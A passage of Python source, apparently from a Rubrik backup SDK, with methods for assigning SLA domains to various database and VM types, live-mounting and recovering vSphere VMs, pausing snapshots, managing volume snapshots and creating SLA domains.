"assign_sla: Creating filesets for a network host. Each fileset is a fileset template applied to a host")
bulk = [{
'isPassthrough': False,
'shareId': share_id,
'templateId': template_id
}]
fileset_response = self.post(
"internal", "/fileset/bulk", bulk, timeout)
fileset_id = fileset_response['data'][0]['id']
if sla_id == fileset_summary['data'][0]['configuredSlaDomainId']:
return "No change required. The NAS fileset '{}' is already assigned to the '{}' SLA Domain.".format(
object_name, sla_name)
else:
self.log("assign_sla: Assigning the fileset '{}' to the '{}' SLA Domain.".format(
object_name, sla_name))
config = {}
config['managedIds'] = [fileset_id]
return self.post("internal", "/sla_domain/{}/assign".format(sla_id), config, timeout=180)
elif object_type == 'ahv':
self.log("assign_sla: Searching the Rubrik cluster for the AHV VM '{}'.".format(
object_name))
vm_id = self.object_id(object_name, object_type, timeout=timeout)
self.log("assign_sla: Determing the SLA Domain currently assigned to the AHV VM '{}'.".format(
object_name))
vm_summary = self.get(
'internal', '/nutanix/vm/{}'.format(vm_id), timeout=timeout)
if sla_id == vm_summary['configuredSlaDomainId']:
return "No change required. The AHV VM '{}' is already assigned to the '{}' SLA Domain.".format(
object_name, sla_name)
else:
self.log("assign_sla: Assigning the AHV VM '{}' to the '{}' SLA Domain.".format(
object_name, sla_name))
config = {}
config['managedIds'] = [vm_id]
return self.post("internal", "/sla_domain/{}/assign".format(sla_id), config, timeout)
elif object_type == 'mssql_host':
host_id = ''
mssql_id = ''
db_sla_lst = []
self.log('Searching the Rubrik cluster for the current hosts.')
current_hosts = self.get(
'v1',
'/host?operating_system_type=Windows&primary_cluster_id=local',
timeout=timeout)
# After 5.0, "hostname" is a deprecated field in the results that are returned in "current_hosts"
if self.minimum_installed_cdm_version(5.0):
current_hosts_name = "name"
else:
current_hosts_name = "hostname"
for rubrik_host in current_hosts['data']:
if rubrik_host[current_hosts_name] == object_name:
host_id = rubrik_host['id']
if(host_id):
self.log("assign_sla: Searching the Rubrik cluster for the MSSQL Instance '{}'.".format(
object_name))
mssql_instances = self.get(
'v1', '/mssql/instance?root_id={}'.format(host_id), timeout=timeout)
for mssql_instance in mssql_instances['data']:
mssql_id = mssql_instance['id']
mssql_instance_name = mssql_instance['name']
self.log(
"assign_sla: Determing the SLA Domain currently assigned to the MSSQL Instance '{}'.".format(mssql_instance_name))
mssql_summary = self.get(
'v1', '/mssql/instance/{}'.format(mssql_id), timeout=timeout)
if (sla_id == mssql_summary['configuredSlaDomainId'] and log_backup_frequency_in_seconds == mssql_summary['logBackupFrequencyInSeconds'] and
log_retention_hours == mssql_summary['logRetentionHours'] and copy_only == mssql_summary['copyOnly']):
return "No change required. The MSSQL Instance '{}' is already assigned to the '{}' SLA Domain with the following log settings:" \
" log_backup_frequency_in_seconds: {}, log_retention_hours: {} and copy_only: {}.".format(
object_name, sla_name, log_backup_frequency_in_seconds, log_retention_hours, copy_only)
else:
self.log(
"assign_sla: Assigning the MSSQL Instance '{}' to the '{}' SLA Domain.".format(
object_name, sla_name))
config = {}
if log_backup_frequency_in_seconds is not None:
config['logBackupFrequencyInSeconds'] = log_backup_frequency_in_seconds
if log_retention_hours is not None:
config['logRetentionHours'] = log_retention_hours
if copy_only is not None:
config['copyOnly'] = copy_only
config['configuredSlaDomainId'] = sla_id
patch_resp = self.patch(
"v1", "/mssql/instance/{}".format(mssql_id), config, timeout)
db_sla_lst.append(patch_resp)
else:
raise InvalidParameterException(
"Host ID not found for instance '{}'".format(object_name))
return db_sla_lst
elif object_type == 'oracle_db':
oracle_db_id = ''
self.log(
'Searching the Rubrik cluster for the current Oracle databases.')
oracle_db_id = self.object_id(
object_name, object_type, hostname=hostname)
if(oracle_db_id):
self.log(
"assign_sla: Determing the SLA Domain currently assigned to the Oracle Database '{}'.".format(object_name))
oracle_summary = self.get(
'internal',
'/oracle/db/{}'.format(oracle_db_id),
timeout=timeout)
if (sla_id == oracle_summary['configuredSlaDomainId'] and log_backup_frequency_in_minutes == oracle_summary['logBackupFrequencyInMinutes'] and
log_retention_hours == oracle_summary['logRetentionHours'] and num_channels == oracle_summary['numChannels']):
return "No change required. The Oracle Database '{}' is already assigned to the '{}' SLA Domain with the following log settings:" \
" log_backup_frequency_in_minutes: {}, log_retention_hours: {} and num_channels: {}.".format(
object_name, sla_name, log_backup_frequency_in_minutes, log_retention_hours, num_channels)
else:
self.log(
"assign_sla: Assigning the Oracle Database '{}' to the '{}' SLA Domain.".format(
object_name, sla_name))
config = {}
if log_backup_frequency_in_minutes is not None:
config['logBackupFrequencyInMinutes'] = log_backup_frequency_in_minutes
if log_retention_hours is not None:
config['logRetentionHours'] = log_retention_hours
if num_channels is not None:
config['numChannels'] = num_channels
config['configuredSlaDomainId'] = sla_id
patch_resp = self.patch(
"internal", "/oracle/db/{}".format(oracle_db_id), config, timeout)
else:
raise InvalidParameterException(
"Database ID not found for instance '{}'".format(object_name))
return patch_resp
elif object_type == 'oracle_host':
host_id = ''
self.log('Searching the Rubrik cluster for the current Oracle hosts.')
host_id = self.object_id(object_name, object_type)
if(host_id):
self.log(
"assign_sla: Determing the SLA Domain currently assigned to the Oracle Host '{}'.".format(object_name))
oracle_summary = self.get(
'internal',
'/oracle/host/{}'.format(host_id),
timeout=timeout)
if (sla_id == oracle_summary['configuredSlaDomainId'] and log_backup_frequency_in_minutes == oracle_summary['logBackupFrequencyInMinutes'] and
log_retention_hours == oracle_summary['logRetentionHours'] and num_channels == oracle_summary['numChannels']):
return "No change required. The Oracle Host '{}' is already assigned to the '{}' SLA Domain with the following log settings:" \
" log_backup_frequency_in_minutes: {}, log_retention_hours: {} and num_channels: {}.".format(
object_name, sla_name, log_backup_frequency_in_minutes, log_retention_hours, num_channels)
else:
self.log(
"assign_sla: Assigning the Oracle Host '{}' to the '{}' SLA Domain.".format(
object_name, sla_name))
config = {}
if log_backup_frequency_in_minutes is not None:
config['logBackupFrequencyInMinutes'] = log_backup_frequency_in_minutes
if log_retention_hours is not None:
config['logRetentionHours'] = log_retention_hours
if num_channels is not None:
config['numChannels'] = num_channels
config['configuredSlaDomainId'] = sla_id
patch_resp = self.patch(
"internal", "/oracle/host/{}".format(host_id), config, timeout)
else:
raise InvalidParameterException(
"Host ID not found for instance '{}'".format(object_name))
return patch_resp
elif object_type == "volume_group":
volume_group_id = self.object_id(
windows_host, "volume_group", timeout=timeout)
physical_host_id = self.object_id(
windows_host, "physical_host", host_os="windows", timeout=timeout)
self.log("assign_sla: Getting a list of all volumes on the '{}' Windows host.".format(
windows_host))
host_volumes = self.get(
"internal", "/host/{}/volume".format(physical_host_id), timeout=timeout)
# If the object_name (volumes to assign to the SLA) is a string, create a list for processing
if not isinstance(object_name, list):
volumes_to_assign = [object_name]
else:
volumes_to_assign = object_name
# Create a mapping of the volumes on the windows host and their ids
currnt_volumes = {}
for volume in host_volumes["data"]:
for v in volume["mountPoints"]:
if v in volumes_to_assign:
currnt_volumes[v] = volume["id"]
# Validate that the provided volume(s) are on the windows host
for v in volumes_to_assign:
try:
currnt_volumes[v]
except KeyError:
raise InvalidParameterException(
"The Windows Host '{}' does not have a '{}' volume.".format(windows_host, v))
self.log(
"assign_sla: Getting details of the current volume group on the Windows host.")
volume_group_details = self.get(
"internal", "/volume_group/{}".format(volume_group_id), timeout=timeout)
# Create a config of the current volume sla settings
current_volumes_included_in_snapshot = []
for volume in volume_group_details["volumes"]:
current_volumes_included_in_snapshot.append(volume["id"])
current_config = {}
current_config["configuredSlaDomainId"] = volume_group_details["configuredSlaDomainId"]
current_config["volumeIdsIncludedInSnapshots"] = current_volumes_included_in_snapshot
# Create the user desired config
volumes_included_in_snapshot = []
for volume, volume_id in currnt_volumes.items():
volumes_included_in_snapshot.append(volume_id)
config = {}
config["configuredSlaDomainId"] = sla_id
config["volumeIdsIncludedInSnapshots"] = volumes_included_in_snapshot
if current_config == config:
return "No change required. The {} volume_group is already assigned to the {} SLA.".format(
object_name, sla_name)
else:
self.log("assign_sla: Assigning the vSphere VM '{}' to the '{}' SLA Domain.".format(
object_name, sla_name))
return self.patch("internal", "/volume_group/{}".format(volume_group_id), config, timeout=timeout)
def vsphere_live_mount(self, vm_name, date='latest', time='latest', host='current', remove_network_devices=False, power_on=True, timeout=15): # pylint: ignore
"""Live Mount a vSphere VM from a specified snapshot. If a specific date and time is not provided, the last snapshot taken will be used.
Arguments:
vm_name {str} -- The name of the vSphere VM to Live Mount.
Keyword Arguments:
date {str} -- The date of the snapshot you wish to Live Mount formated as `Month-Day-Year` (ex: 1-15-2014). If `latest` is specified, the last snapshot taken will be used. (default: {'latest'})
time {str} -- The time of the snapshot you wish to Live Mount formated as `Hour:Minute AM/PM` (ex: 1:30 AM). If `latest` is specified, the last snapshot taken will be used. (default: {'latest'})
host {str} -- The hostname or IP address of the ESXi host to Live Mount the VM on. By default, the current host will be used. (default: {'current'})
remove_network_devices {bool} -- Flag that determines whether to remove the network interfaces from the Live Mounted VM. Set to `True` to remove all network interfaces. (default: {False})
power_on {bool} -- Flag that determines whether the VM should be powered on after the Live Mount. Set to `True` to power on the VM. Set to `False` to mount the VM but not power it on. (default: {True})
timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {15})
Returns:
dict -- The full response of `POST /v1/vmware/vm/snapshot/{snapshot_id}/mount`.
"""
self.function_name = inspect.currentframe().f_code.co_name
if isinstance(remove_network_devices, bool) is False:
raise InvalidTypeException(
"The 'remove_network_devices' argument must be True or False.")
elif isinstance(power_on, bool) is False:
raise InvalidTypeException(
"The 'power_on' argument must be True or False.")
elif date != 'latest' and time == 'latest' or date == 'latest' and time != 'latest':
raise InvalidParameterException(
"The date and time arguments most both be 'latest' or a specific date and time.")
self.log(
"vsphere_live_mount: Searching the Rubrik cluster for the vSphere VM '{}'.".format(vm_name))
vm_id = self.object_id(vm_name, 'vmware', timeout=timeout)
self.log(
"vsphere_live_mount: Getting a list of all Snapshots for vSphere VM '{}'.".format(vm_name))
vm_summary = self.get(
'v1', '/vmware/vm/{}'.format(vm_id), timeout=timeout)
if date == 'latest' and time == 'latest':
number_of_snapshots = len(vm_summary['snapshots'])
snapshot_id = vm_summary['snapshots'][number_of_snapshots - 1]['id']
else:
self.log(
"vsphere_live_mount: Converting the provided date/time into UTC.")
snapshot_date_time = self._date_time_conversion(date, time)
current_snapshots = {}
for snapshot in vm_summary['snapshots']:
current_snapshots[snapshot['id']] = snapshot['date']
self.log("vsphere_live_mount: Searching for the provided snapshot.")
for id, date_time in current_snapshots.items():
if snapshot_date_time in date_time:
snapshot_id = id
try:
snapshot_id
except NameError:
raise InvalidParameterException("The vSphere VM '{}' does not have a snapshot taken on {} at {}.".format(
vm_name, date, time))
else:
if host == 'current':
host_id = vm_summary['hostId']
else:
host_id = self.object_id(host, 'vmware_host', timeout=timeout)
config = {}
config['hostId'] = host_id
config['removeNetworkDevices'] = remove_network_devices
config['powerOn'] = power_on
self.log(
"vsphere_live_mount: Live Mounting the snapshot taken on {} at {} for vSphere VM '{}'.".format(
date,
time,
vm_name))
return self.post('v1', '/vmware/vm/snapshot/{}/mount'.format(snapshot_id), config, timeout)
def vsphere_instant_recovery(self, vm_name, date='latest', time='latest', host='current', remove_network_devices=False, power_on=True, disable_network=False, keep_mac_addresses=False, preserve_moid=False, timeout=15): # pylint: ignore
"""Instantly recover a vSphere VM from a provided snapshot. If a specific date and time is not provided, the last snapshot taken will be used.
Arguments:
vm_name {str} -- The name of the VM to Instantly Recover.
Keyword Arguments:
date {str} -- The date of the snapshot you wish to Instantly Recover formated as `Month-Day-Year` (ex: 1-15-2014). If 'latest' is specified, the last snapshot taken will used. (default: {'latest'})
time {str} -- The time of the snapshot you wish to Instantly Recover formated as `Hour:Minute AM/PM` (ex: 1:30 AM). If 'latest' is specified, the last snapshot taken will be used. (default: {'latest'})
host {str} -- The hostname or IP address of the ESXi host to Instantly Recover the VM on. By default, the current host will be used. (default: {'current'})
remove_network_devices {bool} -- Flag that determines whether to remove the network interfaces from the Instantly Recovered VM. Set to `True` to remove all network interfaces. (default: {False})
power_on {bool} -- Flag that determines whether the VM should be powered on after Instant Recovery. Set to `True` to power on the VM. Set to `False` to instantly recover the VM but not power it on. (default: {True})
disable_network {bool} -- Sets the state of the network interfaces when the VM is instantly recovered. Use `False` to enable the network interfaces. Use `True` to disable the network interfaces. Disabling the interfaces can prevent IP conflicts. (default: {False})
keep_mac_addresses {bool} -- Flag that determines whether the MAC addresses of the network interfaces on the source VM are assigned to the new VM. Set to `True` to assign the original MAC addresses to the new VM. Set to `False` to assign new MAC addresses. When 'remove_network_devices' is set to `True`, this property is ignored. (default: {False})
preserve_moid {bool} -- Flag that determines whether to preserve the MOID of the source VM in a restore operation. Use `True` to keep the MOID of the source. Use `False` to assign a new moid. (default: {False})
timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {15})
Returns:
dict -- The full response of `POST /v1/vmware/vm/snapshot/{snapshot_id}/instant_recover`.
"""
self.function_name = inspect.currentframe().f_code.co_name
if isinstance(remove_network_devices, bool) is False:
raise InvalidTypeException(
"The 'remove_network_devices' argument must be True or False.")
elif isinstance(power_on, bool) is False:
raise InvalidTypeException(
"The 'power_on' argument must be True or False.")
elif isinstance(disable_network, bool) is False:
raise InvalidTypeException(
"The 'disable_network' argument must be True or False.")
elif isinstance(keep_mac_addresses, bool) is False:
raise InvalidTypeException(
"The 'keep_mac_addresses' argument must be True or False.")
elif isinstance(preserve_moid, bool) is False:
raise InvalidTypeException(
"The 'preserve_moid' argument must be True or False.")
elif date != 'latest' and time == 'latest' or date == 'latest' and time != 'latest':
raise InvalidParameterException(
"The date and time arguments most both be 'latest' or a specific date and time.")
self.log(
"vsphere_instant_recovery: Searching the Rubrik cluster for the vSphere VM '{}'.".format(vm_name))
vm_id = self.object_id(vm_name, 'vmware', timeout=timeout)
self.log(
"vsphere_instant_recovery: Getting a list of all Snapshots for vSphere VM '{}'.".format(vm_name))
vm_summary = self.get(
'v1', '/vmware/vm/{}'.format(vm_id), timeout=timeout)
if date == 'latest' and time == 'latest':
number_of_snapshots = len(vm_summary['snapshots'])
snapshot_id = vm_summary['snapshots'][number_of_snapshots - 1]['id']
else:
self.log(
"vsphere_instant_recovery: Converting the provided date/time into UTC.")
snapshot_date_time = self._date_time_conversion(date, time)
current_snapshots = {}
for snapshot in vm_summary['snapshots']:
current_snapshots[snapshot['id']] = snapshot['date']
self.log(
"vsphere_instant_recovery: Searching for the provided snapshot.")
for id, date_time in current_snapshots.items():
if snapshot_date_time in date_time:
snapshot_id = id
try:
snapshot_id
except NameError:
raise InvalidParameterException(
"The vSphere VM '{}' does not have a snapshot taken on {} at {}.".format(
vm_name, date, time))
else:
if host == 'current':
host_id = vm_summary['hostId']
else:
host_id = self.object_id(host, 'vmware_host', timeout=timeout)
config = {}
config['hostId'] = host_id
config['removeNetworkDevices'] = remove_network_devices
config['powerOn'] = power_on
config['disableNetwork'] = disable_network
config['keepMacAddresses'] = keep_mac_addresses
config['preserveMoid'] = preserve_moid
self.log("vsphere_instant_recovery: Instantly Recovering the snapshot taken on {} at {} for vSphere VM '{}'.".format(
date,
time,
vm_name))
return self.post('v1', '/vmware/vm/snapshot/{}/instant_recover'.format(snapshot_id), config, timeout)
def _date_time_conversion(self, date, time, timeout=30):
"""All date values returned by the Rubrik API are stored in Coordinated Universal Time (UTC)
and need to be converted to the timezone configured on the Rubrik cluster in order to match
the values provided by the end user in various functions. This internal function will handle that
conversion process.
Arguments:
date {str} -- A date value formated as `Month-Day-Year` (ex: 1/15/2014).
time {str} -- A time value formated as `Hour:Minute AM/PM` (ex: 1:30 AM).
Returns:
str -- A combined date/time value formated as `Year-Month-DayTHour:Minute` where Hour:Minute is on the 24-hour clock (ex : 2014-1-15T01:30).
"""
if self.function_name == "":
self.function_name = inspect.currentframe().f_code.co_name
from datetime import datetime
import pytz
# Validate the Date formating
try:
datetime.strptime(date, '%m-%d-%Y')
except ValueError:
raise InvalidParameterException(
"The date argument '{}' must be formatd as 'Month-Date-Year' (ex: 8-9-2018).".format(date))
# Validate the Time formating
try:
snapshot_time = datetime.strptime(time, '%I:%M %p')
except ValueError:
raise InvalidParameterException(
"The time argument '{}' must be formatd as 'Hour:Minute AM/PM' (ex: 2:57 AM).".format(time))
self.log("_date_time_conversion: Getting the Rubrik cluster timezone.")
cluster_summary = self.get('v1', '/cluster/me', timeout=timeout)
cluster_timezone = cluster_summary['timezone']['timezone']
self.log(
"_date_time_conversion: Converting the provided time to the 24-hour clock.")
snapshot_time_24_hour_clock = datetime.strftime(snapshot_time, "%H:%M")
self.log("_date_time_conversion: Creating a combined date/time variable.")
snapshot_datetime = datetime.strptime('{} {}'.format(
date, snapshot_time_24_hour_clock), '%m-%d-%Y %H:%M')
# Add Timezone to snapshot_datetime Variable
timezone = pytz.timezone(cluster_timezone)
snapshot_datetime = timezone.localize(snapshot_datetime)
self.log("_date_time_conversion: Converting the time to UTC.\n")
utc_timezone = pytz.UTC
snapshot_datetime = snapshot_datetime.astimezone(utc_timezone)
return snapshot_datetime.strftime('%Y-%m-%dT%H:%M')
def pause_snapshots(self, object_name, object_type, timeout=180):
"""Pause all snapshot activity for the provided object.
Arguments:
object_name {str} -- The name of the Rubrik object to pause snapshots for.
object_type {str} -- The Rubrik object type you wish to pause snaphots on. (choices: {vmware})
Keyword Arguments:
timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster. (default: {180})
Returns:
str -- No change required. The '`object_type`' '`object_name`' is already paused.
dict -- The full API response for `PATCH /v1/vmware/vm/{vm_id}`.
"""
self.function_name = inspect.currentframe().f_code.co_name
valid_object_type = ['vmware']
if object_type not in valid_object_type:
raise InvalidParameterException("The pause_snapshots() object_type argument must be one of the following: {}.".format(
valid_object_type))
if object_type == 'vmware':
self.log("pause_snapshots: Searching the Rubrik cluster for the vSphere VM '{}'.".format(
object_name))
vm_id = self.object_id(object_name, object_type, timeout=timeout)
self.log("pause_snapshots: Determing the current pause state of the vSphere VM '{}'.".format(
object_name))
api_request = self.get(
'v1', '/vmware/vm/{}'.format(vm_id), timeout=timeout)
if api_request['blackoutWindowStatus']['isSnappableBlackoutActive']:
return "No change required. The {} VM '{}' is already paused.".format(object_type, object_name)
else:
self.log("pause_snapshots: Pausing Snaphots for the vSphere VM '{}'.".format(
object_name))
config = {}
config['isVmPaused'] = True
return self.patch('v1', '/vmware/vm/{}'.format(vm_id), config, timeout)
def resume_snapshots(self, object_name, object_type, timeout=180):
"""Resume all snapshot activity for the provided object.
Arguments:
object_name {str} -- The name of the Rubrik object to resume snapshots for.
object_type {str} -- The Rubrik object type you wish to resume snaphots on. (choices: {vmware})
Keyword Arguments:
timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster. (default: {180})
Returns:
str -- No change required. The 'object_type' object 'object_name' is currently not paused.
dict -- The full response for `PATCH /v1/vmware/vm/{vm_id}`.
"""
self.function_name = inspect.currentframe().f_code.co_name
valid_object_type = ['vmware']
if object_type not in valid_object_type:
raise InvalidParameterException("The resume_snapshots() object_type argument must be one of the following: {}.".format(
valid_object_type))
if object_type == 'vmware':
self.log("resume_snapshots: Searching the Rubrik cluster for the vSphere VM '{}'.".format(
object_name))
vm_id = self.object_id(object_name, object_type, timeout=timeout)
self.log("resume_snapshots: Determing the current pause state of the vSphere VM '{}'.".format(
object_name))
api_request = self.get(
'v1', '/vmware/vm/{}'.format(vm_id), timeout=timeout)
if not api_request['blackoutWindowStatus']['isSnappableBlackoutActive']:
return "No change required. The '{}' object '{}' is currently not paused.".format(
object_type, object_name)
else:
self.log("resume_snapshots: Resuming Snaphots for the vSphere VM '{}'.".format(
object_name))
config = {}
config['isVmPaused'] = False
return self.patch('v1', '/vmware/vm/{}'.format(vm_id), config, timeout)
def begin_managed_volume_snapshot(self, name, timeout=30):
"""Open a managed volume for writes. All writes to the managed volume until the snapshot is ended will be part of its snapshot.
Arguments:
name {str} -- The name of the Managed Volume to begin the snapshot on.
Keyword Arguments:
timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster. (default: {30})
Returns:
str -- No change required. The Managed Volume '`name`' is already assigned in a writeable state.
dict -- The full API response for `POST /managed_volume/{id}/begin_snapshot`.
"""
self.function_name = inspect.currentframe().f_code.co_name
self.log(
"begin_managed_volume_snapshot: Searching the Rubrik cluster for the Managed Volume '{}'.".format(name))
managed_volume_id = self.object_id(
name, 'managed_volume', timeout=timeout)
self.log(
"begin_managed_volume_snapshot: Determing the state of the Managed Volume '{}'.".format(name))
managed_volume_summary = self.get(
'internal', '/managed_volume/{}'.format(managed_volume_id), timeout=timeout)
if not managed_volume_summary['isWritable']:
self.log(
"begin_managed_volume_snapshot: Setting the Managed Volume '{}' to a writeable state.".format(name))
return self.post('internal', '/managed_volume/{}/begin_snapshot'.format(managed_volume_id),
config={}, timeout=timeout)
else:
return "No change required. The Managed Volume '{}' is already assigned in a writeable state.".format(name)
def end_managed_volume_snapshot(self, name, sla_name='current', timeout=30):
"""Close a managed volume for writes. A snapshot will be created containing all writes since the last begin snapshot call.
Arguments:
name {str} -- The name of the Managed Volume to end snapshots on.
Keyword Arguments:
sla_name {str} -- The SLA Domain name you want to assign the snapshot to. By default, the currently assigned SLA Domain will be used. (default: {'current'})
timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster. (default: {30})
Returns:
str -- No change required. The Managed Volume `name` is already assigned in a read only state.
dict -- The full API response for `POST /managed_volume/{id}/end_snapshot`.
"""
self.function_name = inspect.currentframe().f_code.co_name
self.log(
"end_managed_volume_snapshot: Searching the Rubrik cluster for the Managed Volume '{}'.".format(name))
managed_volume_id = self.object_id(
name, 'managed_volume', timeout=timeout)
self.log(
"end_managed_volume_snapshot: Determing the state of the Managed Volume '{}'.".format(name))
managed_volume_summary = self.get(
"internal", "/managed_volume/{}".format(managed_volume_id), timeout=timeout)
if not managed_volume_summary['isWritable']:
return "No change required. The Managed Volume 'name' is already assigned in a read only state."
if sla_name == 'current':
self.log(
"end_managed_volume_snapshot: Searching the Rubrik cluster for the SLA Domain assigned to the Managed Volume '{}'.".format(name))
if managed_volume_summary['slaAssignment'] == 'Unassigned' or managed_volume_summary['effectiveSlaDomainId'] == 'UNPROTECTED':
raise InvalidParameterException(
"The Managed Volume '{}' does not have a SLA assigned currently assigned. You must populate the sla_name argument.".format(name))
config = {}
else:
self.log(
"end_managed_volume_snapshot: Searching the Rubrik cluster for the SLA Domain '{}'.".format(sla_name))
sla_id = self.object_id(sla_name, 'sla', timeout=timeout)
config = {}
config['retentionConfig'] = {}
config['retentionConfig']['slaId'] = sla_id
return self.post("internal", "/managed_volume/{}/end_snapshot".format(managed_volume_id), config, timeout)
def get_sla_objects(self, sla, object_type, timeout=15):
"""Retrieve the name and ID of a specific object type.
Arguments:
sla {str} -- The name of the SLA Domain you wish to search.
object_type {str} -- The object type you wish to search the SLA for. (choices: {vmware, hyper-v, mssql_db, ec2_instance, oracle_db, vcd, managed_volume, ahv, nas_share, linux_and_unix_host, windows_host})
Keyword Arguments:
timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster. (default: {15})
Returns:
dict -- The `name:id` of each object in the provided SLA Domain.
"""
if self.function_name == "":
self.function_name = inspect.currentframe().f_code.co_name
valid_object_type = ['vmware', 'hyper-v',
'mssql_db', 'ec2_instance', 'oracle_db', 'vcd', 'managed_volume', 'ahv', 'nas_share', 'linux_and_unix_host', 'windows_host']
if object_type not in valid_object_type:
raise InvalidParameterException(
"The get_sla_object() object_type argument must be one of the following: {}.".format(valid_object_type))
sla_id = self.object_id(sla, "sla", timeout=timeout)
vm_name_id = {}
if object_type == "nas_share":
# The REST API does not have an easy way to filter by SLA so we will use the GQL call
operation_name = "NasAssignedSLA"
query = """
NasAssignedSLA($effectiveSlaDomainId: String) {
nasShareConnection(effectiveSlaDomainId: $effectiveSlaDomainId) {
nodes {
id
hostname
}
}
}
"""
variables = {
"effectiveSlaDomainId": sla_id
}
all_vms_in_sla = self.query(query, operation_name, variables)
for vm in all_vms_in_sla["nasShareConnection"]["nodes"]:
vm_name_id[vm["hostname"]] = vm["id"]
elif object_type == "linux_and_unix_host" or object_type == "windows_host":
# The REST API does not have an easy way to filter by SLA so we will use the GQL call
operation_name = "PhysicalHostSLA"
query = """
PhysicalHostSLA($effectiveSlaDomainId: String, $operatingSystemType: String, $status: String) {
hostConnection(effectiveSlaDomainId: $effectiveSlaDomainId, operatingSystemType: $operatingSystemType, status: $status) {
nodes {
id
hostname
}
}
}
"""
if object_type == "linux_and_unix_host":
operatingSystemType = "UnixLike"
else:
operatingSystemType = "Windows"
variables = {
"status": "Connected",
"effectiveSlaDomainId": sla_id,
"operatingSystemType": operatingSystemType,
}
all_vms_in_sla = self.query(query, operation_name, variables)
for vm in all_vms_in_sla["hostConnection"]["nodes"]:
vm_name_id[vm["hostname"]] = vm["id"]
else:
api_call = {
"vmware": {
"api_version": "v1",
"api_endpoint": "/vmware/vm"
},
"hyper-v": {
"api_version": "internal",
"api_endpoint": "/hyperv/vm"
},
"mssql_db": {
"api_version": "v1",
"api_endpoint": "/mssql/db"
},
"ec2_instance": {
"api_version": "internal",
"api_endpoint": "/aws/ec2_instance"
},
"oracle_db": {
"api_version": "internal",
"api_endpoint": "/oracle/db"
},
"vcd": {
"api_version": "internal",
"api_endpoint": "/vcd/vapp"
},
"managed_volume": {
"api_version": "internal",
"api_endpoint": "/managed_volume"
},
"ahv": {
"api_version": "internal",
"api_endpoint": "/nutanix/vm"
},
}
all_vms_in_sla = self.get(
api_call[object_type]["api_version"],
api_call[object_type]["api_endpoint"] +
"?effective_sla_domain_id={}&is_relic=false".format(sla_id),
timeout=timeout)
for vm in all_vms_in_sla["data"]:
vm_name_id[vm["name"]] = vm["id"]
if bool(vm_name_id) is False:
raise InvalidParameterException(
"The SLA '{}' is currently not protecting any {} objects.".format(
sla, object_type))
return vm_name_id
def create_sla(self, name, hourly_frequency=None, hourly_retention=None, daily_frequency=None, daily_retention=None, monthly_frequency=None, monthly_retention=None, yearly_frequency=None, yearly_retention=None, archive_name=None, retention_on_brik_in_days=None, instant_archive=False, timeout=15): # pylint: ignore
"""Create a new SLA Domain.
Arguments:
name {str} -- The name of the new SLA Domain.
Keyword Arguments:
hourly_frequency {int} -- Hourly frequency to take backups. (default: {None})
hourly_retention {int} -- Number of hours to retain the hourly backups. (default: {None})
daily_frequency {int} -- Daily frequency to take backups. (default: {None})
daily_retention {int} -- Number of hours to retain the daily backups. (default: {None})
monthly_frequency {int} -- Monthly frequency to take backups. (default: {None})
monthly_retention {int} -- Number of hours to retain the monthly backups. (default: {None})
yearly_frequency {int} -- Yearly frequency to take backups. (default: {None})
yearly_retention {int} -- Number of hours to retain the yearly backups. (default: {None})
archive_name {str} -- The optional archive location you wish to configure on the SLA Domain. When populated, you must also provide a `retention_on_brik_in_days`. (default: {None})
retention_on_brik_in_days {int} -- The number of days you wish to keep the backups on the Rubrik cluster. When populated, you must also provide a `archive_name`. (default: {None})
instant_archive= {bool} -- Flag that determines whether or not to enable instant archive. Set to true to enable. (default: {False})
Returns:
str -- No change required. The 'name' SLA Domain is already configured with the provided configuration.
dict -- The full API response for `POST /v1/sla_domain`.
dict -- The full API response for `POST /v2/sla_domain`.
"""
self.function_name = inspect.currentframe().f_code.co_name
v2_sla = self.minimum_installed_cdm_version("5.0", timeout=timeout)
all_params = [
hourly_frequency,
hourly_retention,
daily_frequency,
daily_retention,
monthly_frequency,
monthly_retention,
yearly_frequency,
yearly_retention]
# Validate all values besides name are ints
for param in all_params:
if not isinstance(param, int) and param is not None:
raise InvalidParameterException(
"All 'frequency' and 'retention' parameters must be integers.")
if not isinstance(retention_on_brik_in_days, int) and retention_on_brik_in_days is not None:
raise InvalidParameterException(
"The 'retention_on_brik_in_days' parameter must be integer.")
# Make sure at least one frequency and retention is populated
if all(value is None for value in all_params):
raise InvalidParameterException(
"You must populate at least one frequency and retention.")
# Make sure the "time unit" frequency and retention are used together
if hourly_frequency is not None and hourly_retention is None or hourly_frequency is None and hourly_retention is not None:
raise InvalidParameterException(
"The 'hourly_frequency' and 'hourly_retention' parameters must be populated together.")
if daily_frequency is not None and daily_retention is None or daily_frequency is None and daily_retention is not None:
raise InvalidParameterException(
"The 'daily_frequency' and 'daily_retention' parameters must be populated together.")
if monthly_frequency is not None and monthly_retention is None or monthly_frequency is None and monthly_retention is not None:
raise InvalidParameterException(
"The 'monthly_frequency' and 'monthly_retention' parameters must be populated together.")
if yearly_frequency is not None and yearly_retention is None or yearly_frequency is None and yearly_retention is not None:
raise InvalidParameterException(
"The 'yearly_frequency' and 'yearly_retention' parameters must be populated together.")
if archive_name is not None and retention_on_brik_in_days is None or archive_name is None and retention_on_brik_in_days is not None:
raise InvalidParameterException(
"The 'archive_name' and 'retention_on_brik_in_days' parameters must be populated together.")
try:
# object_id() will set sla_already_present to something besides False if the SLA is already on the cluter
sla_id = self.object_id(name, "sla", timeout=timeout)
except InvalidParameterException:
sla_id = False
config = {}
config["name"] = name
if v2_sla is True:
# create the config for the v2 API
config["frequencies"] = {}
if hourly_frequency is not None:
config["frequencies"]["hourly"] = {}
config["frequencies"]["hourly"]["frequency"] = hourly_frequency
config["frequencies"]["hourly"]["retention"] = hourly_retention
if daily_frequency is not None:
config["frequencies"]["daily"] = {}
config["frequencies"]["daily"]["frequency"] = daily_frequency
config["frequencies"]["daily"]["retention"] = daily_retention
if monthly_frequency is not None:
config["frequencies"]["monthly"] = {}
config["frequencies"]["monthly"]["dayOfMonth"] = "LastDay"
config["frequencies"]["monthly"]["frequency"] = monthly_frequency
config["frequencies"]["monthly"]["retention"] = monthly_retention
if yearly_frequency is not None:
config["frequencies"]["yearly"] = {}
config["frequencies"]["yearly"]["yearStartMonth"] = "January"
